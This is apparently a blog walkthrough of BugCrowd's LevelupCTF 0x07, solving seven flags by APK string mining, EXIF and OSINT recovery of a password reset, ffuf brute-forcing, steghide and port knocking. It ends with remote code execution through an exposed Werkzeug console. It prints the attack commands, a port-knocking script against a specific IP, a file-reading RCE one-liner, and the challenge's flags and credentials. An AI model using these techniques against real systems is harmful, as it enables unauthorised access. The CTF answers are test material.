BugCrowd’s LevelupCTF 0x07 walkthrough

LevelupCTF is a seven flag CTF. It contains vulnerabilities from information disclosures to Remote Code execution. Each flag provides hints towards the next flag. The CTF consists of wide range of challenges which provides great learning as well.
Below are the vulnerabilities and their impacts that I have found:

Sensitive Data Exposure – P4
Broken Access Control (BAC) [Exposed Sensitive Android Intent] – P4
Sensitive Data Exposure [images] – P3
Sensitive Data Exposure [Disclosure of Secrets- Web Application] – P3
Sensitive Data Exposure [ Image Steganography ] – P3
Remote Code Execution – P1
Remote Code Execution – P1

Below is the Walkthrough/Proof of Concept to get each flag.

FLAG-1:

Once we visit https://07.levelupctf.com, during reconnaissance, you will find “brief” command pointing us towards “/radio” URL.

Visiting on /radio gave me a login panel. I tried SQLi, but it didn’t give me anything. While going through the Source Code of the page I found a “login.js” file in assets [https://07.levelupctf.com/assets/js/login.js], which seems to be a bit weird because usually the forms and other sensitive data is actually written in a server side language. When I opened it I found the Flag and the hint towards the next challenge. Simply a Sensitive information disclosure.

The information must never be stored in such a way, “If you are making it easy for yourself, you are making it easy for everyone else.”

FLAG-2:

When I visited the URL provided under first flag, “https://07.levelupctf.com/222228a4e79d33a299f5d/s3cretc0mmunications”, I got an .apk file.
I used the command “grep ‘Flag{‘ . “, found a matching file which was “resources.arsc“, after doing a quick : “ strings resources.arsc | grep “FLAG{“
I found the flag 2.

 

FLAG-3:

This time, after finding the Flag for Level 2, I couldn’t find any clue for level 3. Comparatively, this level was hard. I did a lot of digging to get this.
strings command over “classes.dex” file gave me below two URLs:
E/d41d8cd98f00b204e9800998ecf8427e/8cd98f00b204e9800998/forgotpassword
5/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat
/index.html
/login

when visiting the above chat url, it gives an invalid key error.

 

So, now I know I am looking for a key. I thought to extract the apk, using apktools. I did a “grep -r -A 20 -B 20 “FLAG “

This gave me:

res/values/strings.xml- 8b0955d2682eb74347b9e71ea0558c67
res/values/strings.xml: FLAG{a445c73c8cb97421d1923a8c51c221fd}

I tried putting “encrypted_chat_key:8b0955d2682eb74347b9e71ea0558c67” in the header using burp. But no luck. I looked again using “grep -r -A 20 -B 20 “5/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat“.
I got this entry:
smali/com/example/levelup/MainActivity.smali- const-string v3, “3NCRYPT3D-CH4T”“.

Used this in header ‘3NCRYPT3D-CH4T:8b0955d2682eb74347b9e71ea0558c67‘, and it worked. Found the chat:

On Giraffe image, If you do exif, you will get the flag and also information regarding the next flag.

 

FLAG-4:

From Giraffe image, You will get the GPS location of where the picture is taken.

Time to use the /forgorpassword from level 3.
From the chat we know the agents name: “agent_521bcd5“. I put this in forgot password page for username and it gave me this question:

“What is the name of your favorite lion at the zoo?”

Here I did some OSINT using the actual GPS location from the giraffe image. It gave me “San Francisco Zoo”, later on Googling about the lion name, I got “Jahari“, It worked on this. It gave me temporary login passcode to agent_521bcd5 :

After logging in, with agent_521bcd5 and 9a76a913ee9ae8d5b2, It gave me a target list. At this point, I checked back “/radio” URL and there was the 4th flag:

 

FLAG-5:

The hint for the next flag points towards the images in target list.

agent
ive noticed
obelisk hides
missions
in images
check out
the
target list
secret is
pwn4llthebugz
FLAG{f514875849460428b4dc40dd72a5a29a}

I looked at the agents pictures under https://07.levelupctf.com/targets.

A couple of things to notice over here, Some agents have numbers written on their images.

agent_01 -1337
agent_05- 415
agent_07 – 2099
agent_09 – 921

In the source code, I found the link under which agents images are stored: https://07.levelupctf.com/agents/

One weird thing about this link was – it was giving 200 OK for every request. So I tried bruteforcing this using ” ffuf -w wordlist.txt -u https://07.levelupctf.com/agents/FUZZ -fs 0“,-fs for filtering out responses that are of 0 length and it gave me agent87.jgp.

I tried exif, found nothing. When I checked the this image under steghide, it asked for the passphrase, I used : pwn4llthebugz, from the above 4th flag.

Here is the 5th flag, with the information for next challenge.

 

FLAG – 6:

Getting this one was a good learning. The challenge is based on the concept of Port Knocking. Its time to use the numbers from the agents images, we found while looking for 5th flag. I made a combination for all the numbers that we have to do port knocking for 3389 port.

Below I am pasting the code and combinations, I have used during the port knocking.
Combination of ports:
1337 415 2099 921
1337 415 921 2099
1337 2099 415 921
1337 2099 921 415
1337 921 2099 415
1337 921 415 2099
415 1337 2099 921
415 1337 921 2099
415 2099 1337 921
415 2099 921 1337
415 921 2099 1337
415 921 1337 2099
2099 415 1337 921
2099 415 921 1337
2099 1337 415 921
2099 1337 921 415
2099 921 1337 415
2099 921 415 1337
921 415 2099 1337
921 415 1337 2099
921 2099 415 1337
921 2099 1337 415
921 1337 2099 415
921 1337 415 2099

The above combination I used for port knocking to open 3389

You can create the above combination using below script:

import itertools
n = ['1337','415','2099','921'] #defines all the number we got in agents images
a = [' '.join(i) for i in itertools.permutations(n, 4)]
print(a)

Below I am pasting the Python script I used for port knocking with above combination:

import sys
import os
import time
#portknock.txt is the file with above combination
with open('portknock.txt','r') as file: 
	for i in file: 
		a= 'knock 165.227.54.122 '+i 
		out=os.system(a)
		time.sleep(3) 
print(out)

After running the above code, you will be able to access http://07.levelupctf.com:3389/.

ffuf command on this gave me /console. I was able to get werkzeug debugger! Since Werkzeug is RCE in itself. There is the P1 vulnerability.

For flag 6 and flag 7, below is the console command I have used to look around the directories:
from subprocess import getoutput; x=getoutput(“cat flag.txt”);print(x,end=’\n’)

After flag 6, I checked every file under the same directory. In .bash_history, I found passwords.txt file under /opt/ directory.

Login using matriarch credentials.

Under gameover you will find your final Flag.

 

Overall, It was a fantastic CTF. A lot of learning on different vulnerabilities. It was pretty hard to get each vulnerability, but my favorite was OSINT.

%d bloggers like this: